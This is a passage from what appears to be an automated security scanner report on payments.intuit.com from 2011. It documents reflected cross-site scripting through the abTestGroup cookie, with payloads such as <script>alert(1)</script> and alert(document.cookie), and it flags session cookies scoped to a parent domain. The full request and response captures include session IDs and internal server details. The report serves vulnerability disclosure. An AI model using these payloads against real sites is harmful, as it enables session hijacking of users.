s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16c79ad"><script>alert(1)</script>e8785a94aac;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=i8iNytoY1Ui6tDFoAVhOcw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AFFB20A0805192AA117E35F81E813
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98215

...[SNIP]...
<input id="testGroup" value="T16c79ad"><script>alert(1)</script>e8785a94aac" type="hidden" />
...[SNIP]...

1.120. http://payments.intuit.com/support/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 77a3a<script>alert(1)</script>eb661626a4c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1677a3a<script>alert(1)</script>eb661626a4c;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+fYnnrFufW+udQMJRBi-CA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C80060A0805192AA117E36100617F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98200

...[SNIP]...
<br />
       A/B Test Group: T1677a3a<script>alert(1)</script>eb661626a4c<br />
...[SNIP]...

1.121. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b0496<script>alert(1)</script>bc940e2dae4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0496<script>alert(1)</script>bc940e2dae4;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=V3muyf7UBAI0P+tkQ9nfKQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3E7D0A0805192AA117E3D2CDCAC4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140109

...[SNIP]...
<br />
       A/B Test Group: T16b0496<script>alert(1)</script>bc940e2dae4<br />
...[SNIP]...

1.122. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb67a"><script>alert(1)</script>411f1d9182d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bb67a"><script>alert(1)</script>411f1d9182d;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:46 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RRotOArxmPQIpIZcrWSlYg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:47 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC1E70A0805192AA117E30C0FAA74
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140123

...[SNIP]...
<input id="testGroup" value="T16bb67a"><script>alert(1)</script>411f1d9182d" type="hidden" />
...[SNIP]...

2. Cookie scoped to parent domain
There are 30 instances of this issue:


2.1. http://payments.intuit.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:51:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=qAxsrp9PR61Zkfu7bywdhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:28:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95481DD0A0805192AA117E3AC0B20D5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108297

...[SNIP]...

2.2. http://payments.intuit.com/apply-now/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:43 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=8ip-v84y9ZWl4HV7CywZHA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:44 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95621C90A0805192AA117E322A75078
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128230

...[SNIP]...

2.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=o3tbY+dzKlKjxj5+PKCbTQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955FB530A0805192AA117E379B3E1C0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161255

...[SNIP]...

2.4. http://payments.intuit.com/apply-now/contact-me.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=cku87sFcjQeXf4yvDjeRwQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F0380A0805192AA117E39D49C0E7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93193

...[SNIP]...

2.5. http://payments.intuit.com/products/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:06 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=KuH0v64gzcCOU-AFN-G2sg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:07 GMT; Path=/
